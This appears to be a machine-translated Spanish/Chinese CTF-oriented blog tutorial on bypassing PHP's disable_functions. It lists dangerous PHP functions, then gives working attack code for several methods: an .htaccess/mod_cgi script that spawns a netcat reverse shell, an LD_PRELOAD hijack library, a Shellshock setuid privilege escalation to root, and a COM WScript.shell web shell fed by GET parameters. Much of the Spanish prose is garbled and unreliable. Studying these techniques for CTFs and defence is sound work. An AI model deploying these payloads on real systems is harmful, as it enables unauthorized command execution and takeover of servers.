Métodos de derivación disable_function y hormigas espada uso plug-derivación-php-función

Métodos de derivación disable_function y hormigas espada uso plug-derivación-php-función

En el aprendizaje de PHP, se encontró que la función de muchos sitios va a causar un gran peligro oculto o sistema, funciones de riesgo comunes son:

phpinfo()
功能描述：输出 PHP 环境信息以及相关的模块、WEB 环境等信息。
危险等级：中

passthru()
功能描述：允许执行一个外部程序并回显输出，类似于 exec()。
危险等级：高

exec()
功能描述：允许执行一个外部程序（如 UNIX Shell 或 CMD 命令等）。
危险等级：高

system()
功能描述：允许执行一个外部程序并回显输出，类似于 passthru()。
危险等级：高

chroot()
功能描述：可改变当前 PHP 进程的工作根目录，仅当系统支持 CLI 模式
PHP 时才能工作，且该函数不适用于 Windows 系统。
危险等级：高

scandir()
功能描述：列出指定路径中的文件和目录。
危险等级：中

chgrp()
功能描述：改变文件或目录所属的用户组。
危险等级：高

chown()
功能描述：改变文件或目录的所有者。
危险等级：高

shell_exec()
功能描述：通过 Shell 执行命令，并将执行结果作为字符串返回。
危险等级：高

proc_open()
功能描述：执行一个命令并打开文件指针用于读取以及写入。
危险等级：高

proc_get_status()
功能描述：获取使用 proc_open() 所打开进程的信息。
危险等级：高

error_log()
功能描述：将错误信息发送到指定位置（文件）。
安全备注：在某些版本的 PHP 中，可使用 error_log() 绕过 PHP safe mode，
执行任意命令。
危险等级：低

ini_alter()
功能描述：是 ini_set() 函数的一个别名函数，功能与 ini_set() 相同。
具体参见 ini_set()。
危险等级：高

ini_set()
功能描述：可用于修改、设置 PHP 环境配置参数。
危险等级：高

ini_restore()
功能描述：可用于恢复 PHP 环境配置参数到其初始值。
危险等级：高

dl()
功能描述：在 PHP 进行运行过程当中（而非启动时）加载一个 PHP 外部模块。
危险等级：高

pfsockopen()
功能描述：建立一个 Internet 或 UNIX 域的 socket 持久连接。
危险等级：高

syslog()
功能描述：可调用 UNIX 系统的系统层 syslog() 函数。
危险等级：中

readlink()
功能描述：返回符号连接指向的目标文件内容。
危险等级：中

symlink()
功能描述：在 UNIX 系统中建立一个符号链接。
危险等级：高

popen()
功能描述：可通过 popen() 的参数传递一条命令，并对 popen() 所打开的文件进行执行。
危险等级：高

stream_socket_server()
功能描述：建立一个 Internet 或 UNIX 服务器连接。
危险等级：中

putenv()
功能描述：用于在 PHP 运行时改变系统字符集环境。在低于 5.2.6 版本的 PHP 中，可利用该函数
修改系统字符集环境后，利用 sendmail 指令发送特殊参数执行系统 SHELL 命令。
危险等级：高

archivo de configuración ini PHP hay una opción de disable_functions, puede desactivar la función de estos peligros

Pero nada está absolutamente seguro, aquí habló de varias formas de burlar los disable_functions:

1, Apache mod_cgi

Aquí tenemos que utilizar .htaccess y mod_cgi

1) .htaccess

En la carga de archivos, ya estamos familiarizados. Para más detalles, Baidu (sé que es sólo una idea de la función de la línea completa es Baidu Enciclopedia respuesta ...)

En circunstancias normales, no debería utilizar archivos .htaccess a menos que no tiene acceso al archivo de configuración principal; archivos .htaccess se deben utilizar en los proveedores de contenido que tenga que cambiar la configuración del servidor bajo privilegios de root, pero ningún caso de un directorio en particular. Si no desea modificar con frecuencia el administrador del servidor de configuración, puede permitir a los usuarios realizar cambios en el fichero de configuración .htaccess, especialmente los usuarios de ISP para ejecutar múltiples sitios en la misma máquina, pero el usuario lo desea, puede cambiar su configuración caso.

2) mod_cgi

En el MPM no roscada ( preforksoporte para la ejecución del script CGI en)

Tiene ningún tipo MIME application/x-httpd-cgio el cgi-scriptprocesador de archivos serán tratados como un script CGI por el servidor se está ejecutando, su salida será devuelto al cliente. Permite dos formas de convertirse en archivos de comandos CGI, uno es el archivo que ha sido AddTypela extensión de la definición de la instrucción, y el otro se encuentra en el archivo de ScriptAliasdirectorio

Manual de Referencia de Apache:https://www.php.cn/manual/view/17782.html#env

Si el archivo .htaccess se modifica atacante, el atacante puede tomar ventaja de mod_cgi módulo de Apache, sin pasar directamente a cualquier restricción de PHP para ejecutar comandos del sistema

Tenemos que cumplir varias condiciones:

第一，必须是apache环境
第二，mod_cgi已经启用
第三，必须允许.htaccess文件，也就是说在httpd.conf中，要注意AllowOverride选项为All，而不是none
第四，必须有权限写.htaccess文件

Ejemplo:

.htaccess内容：
Options +ExecCGI
AddHandler cgi-script .zwi			#这里的.zwi是我构造的，表示.zwi后缀的文件都会被当作cgi脚本执行

shell.zwi
#!/bin/sh
echo&&cd "/var/www/html";ls -al;echo [S];pwd;echo [E]

nota:

Options指令是Apache配置文件中一个比较常见也比较重要的指令，Options指令可以在Apache服务器核心配置(server config)、虚拟主机配置(virtual host)、特定目录配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目录将启用哪些服务器特性。
关于Options指令后可以附加的特性选项的具体作用及含义，可以参考这篇文章：http://www.365mini.com/page/apache-options-directive.htm
当然我们用到的就是ExecCGI选项，表示允许使用mod_cgi模块执行CGI脚本

prueba local:

<?php
$cmd = "nc -c'/bin/bash' 127.0.0.1 4444"; //反弹一个shell出来，这里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"Content-Type: text/html\\n\\n\"\n"; //需要指定这个header，否则会返回500
$shellfile .="$cmd"; 
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ?$yes : $no) . "<br>\n";
}
if(!isset($_GET['checked']))
{
    @file_put_contents('.htaccess',"\nSetEnv HTACCESS on", FILE_APPEND); 
    header('Location: ' . $_SERVER['PHP_SELF']. '?checked=true'); //执行环境的检查
}
else
{
    $modcgi = in_array('mod_cgi',apache_get_modules()); // 检测mod_cgi是否开启
    $writable = is_writable('.'); //检测当前目录是否可写
    $htaccess = !empty($_SERVER['HTACCESS']);//检测是否启用了.htaccess
        checkEnabled("Mod-Cgienabled",$modcgi,"Yes","No");
        checkEnabled("Iswritable",$writable,"Yes","No");
        checkEnabled("htaccessworking",$htaccess,"Yes","No");
    if(!($modcgi && $writable&& $htaccess))
    {
        echo "Error. All of the above mustbe true for the script to work!"; //必须满足所有条件
    }
    else
    {
       
 checkEnabled("Backing 
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in 
.htaccess.bak","Failed!"); //备份一下原有.htaccess
        
checkEnabled("Write 
.htaccessfile",file_put_contents('.htaccess',"Options 
+ExecCGI\nAddHandlercgi-script 
.dizzle"),"Succeeded!","Failed!");//.dizzle，我们的特定扩展名
        checkEnabled("Write shellfile",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!");//写入文件
        checkEnabled("Chmod777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");//给权限
        echo "Executing the script now.Check your listener <img src = 'shell.dizzle' style ='display:none;'>"; //调用
    }
}
?>

CTF 例题: ctfhub - bypass_disable_function

2, LD_PRELOAD

LD_PRELOAD es una variable de entorno en Linux

Se le permite definir la prioridad antes de ejecutar el programa cargado librería de enlace dinámico. Esta función se utiliza principalmente para la misma función de cargar selectivamente diferente biblioteca de vínculos dinámicos. A través de esta variable de entorno, podemos cargar otra librería de enlace dinámico en el medio del programa principal y su librería de enlace dinámico, o incluso anular la biblioteca de la función normal. Por un lado, podemos utilizar esta función para utilizar su cuenta o mejor función (sin tener el código fuente de otra persona), y por otro lado, también podemos programar el procedimiento de inyección a los demás, a fin de lograr un propósito específico.

Esto demuestra que casi podemos secuestrados la mayor parte de las funciones de PHP

Debemos utilizar la putenv (), es decir, las variables de entorno del sistema conjunto, por ejemplo:putenv("NLS_LANG=american_taiwan.zht16big5");

También puede extenderse una getenv (), obtener las variables de entorno del sistema, por ejemplo:$ip = getenv(“REMOTE_ADDR”);

readelf de comandos, por lo general utiliza para ver la información del formato de archivo ELF, archivo común como archivos ejecutables en Linux, librería dinámica ( .so) o una biblioteca estática ( .a) y el otro archivo contiene el formato ELF

prueba:

1, el primero en escribir un archivo zwish.c de vínculos dinámicos

#include<stdlib.h>
#include <stdio.h>        
#include<string.h> 
 
void payload(){
	system("touch /var/www/html/zwish.txt");
}   
 
int geteuid(){
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

Cuando el geteuid biblioteca compartida se llama, trate de cargar la función de carga útil (), ejecutar el comando, crear un directorio zwish.txt en / var / www bajo / html

Compilargcc -c -fPIC zwish.c -o zwish

gcc -shared zwish -o zwish.so

La descentralización zwish.so / var / www / html

A continuación, escriba un index.php

<?php
putenv("LD_PRELOAD=/var/www/html/zwish.so");
mail("admin@localhost","","","","");
?>

Visita el php, encontrar el directorio aparecido zwish.txt

3, shellshock

Shellshock, también conocido como Bashdoor, es una vulnerabilidad de seguridad Bash shell ampliamente utilizado en Unix es, por primera vez el 24 de septiembre, 2 014 abierta. Muchos demonios de Internet, tales como servidores web, utilizando bash para procesar ciertos comandos, lo que permite a un atacante ejecutar código arbitrario en la versión vulnerable de Bash. Esto puede ser explotado para acceder al sistema informático sin autorización. - Extracto de Wikipedia

1) el medio ambiente para construir

Instalar la versión 4.1 de bash con privilegios de root (al menos la versión 4.2 de los agujeros se han enchufado)
bash4.1 dirección de descarga original es HTTP: //ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,
con el fin velocidad, aquí usamos el siguiente Descargar http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长，请等待一会
$ make && make install
#测试是否有bash漏洞，输出vulnerable的话,说明bash有漏洞
$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
$ sudo ln -sf /bin/bash /bin/sh			#最后，让/bin/sh 指向/bin/bash.

Echar un vistazo a ShellShock vulnerabilidades Mami (principio):

export foo='() { :; }; echo Hello World'
bash
>Hello World

¿Por qué invocar fiesta con la salida Hello Worldde la misma? Vistazo a la situación en que hay dentro:

KEY = foo
VALUE = () { :; }; echo Hello World

bash lee la variable de entorno, después de definir una función foo llamar directamente de nuevo. Una vez que la llamada fiesta, estados personalizados desencadenan directamente.

Crear un shock.c

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

Compilación, la potenciación

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock

programa conjunto que ha sido ajustado-UID

Prueba, el modo de administrador primera salida

exit
export foo='() { :; }; bash'
./shock

Se debe poner fin dará cuenta de que tenemos unos privilegios de root directos

4, PHP_FPM

Descripción específica: https://www.php.net/install.fpm

Hay un buen artículo: https://juejin.im/post/58db7d742f301e007e9a00a7

Invocado para explicar algunos otros:

(1) ¿Por qué hay un php-FPM

Todo pies por minuto aparece porque php-fastcgi aparece. Un programa de gestión de buena a fin de lograr el php-fastcgi

(2) ¿Cuál es el php-fastcgi

php-fastcgi sólo un programa CGI, PHP analizará la solicitud y devuelve el resultado, no logra (y por lo tanto no surgió hasta php-fpm).

(3) PHP_FPM

Que es comenzar un programa para gestionar un proceso principal y varios procesos de trabajo.

PHP-FPM crea un control de proceso maestro cuándo y cómo peticiones HTTP a una o más de manipulación proceso hijo. controles de proceso principal también PHP-FPM lo
que creó cuando (aplicaciones Web proceso más tráfico) y destrucción (ejecuta el proceso hijo demasiado tiempo o ya no es necesario)
los procesos secundarios PHP. Cada proceso en presencia de piscina proceso PHP-FPM que la longitud de tiempo de una única solicitud HTTP, puede ser el
procesamiento de una petición HTTP 10,50,100,500 o más.

Después de PHP 5.3.3 php-FPM ha incorporado en el código del núcleo de la php. Por lo tanto, hay php-FPM descarga por separado e instalar.
Para soporte para php php-FPM, sólo se necesita para llevar el código fuente PHP --enable-pies por minuto en tiempo de compilación en él.

principio de derivación específica también tienen un muy buen artículo: https://zhuanlan.zhihu.com/p/75114351?from_voters_page=true

5, UAF

De liberación Re referencias laguna, por ejemplo GC UAF, la vulnerabilidad Json Serializer UAF, Backtrace UAF, etc.

6, FFI

FFI (Función Foreign Interface), es decir, la interfaz de función externa que permite que el código C a la llamada de la zona de usuario. Cuando todas las funciones de la ejecución de comandos PHP se encuentra deshabilitada PHP 7.4 nuevas características se pueden conseguir el código C llamado FFI con código PHP de esa manera, declarar C con el fin de realizar una función, y luego llamar a la función C a bypass por la variable FFI disable_functions

7, los componentes COM

Condiciones: Ventanas, php5.x, componentes de soporte COM

justificación:

Es la primera COM diseño de componentes intención es alcanzar los componentes del programa de lengua transversal de reutilización de componentes de COM para Win 32 emitidos por la biblioteca de vínculos dinámicos (DLL) o en formato ejecutable (EXE) de código ejecutable compuesto. Siga la especificación COM escrito por el conjunto sería capaz de cumplir con todos los requisitos de la arquitectura de componentes. componentes COM pueden ser proporcionados al programa de aplicación, los servicios del sistema operativo, y otros componentes; componentes COM de encargo pueden ser conectados entre sí para formar una aplicación en tiempo de ejecución con los otros componentes; componentes COM pueden ser insertados de forma dinámica o aplicaciones descargadas.

Exp:

<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象　Shell.Application也能
$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
print($stroutput);
?>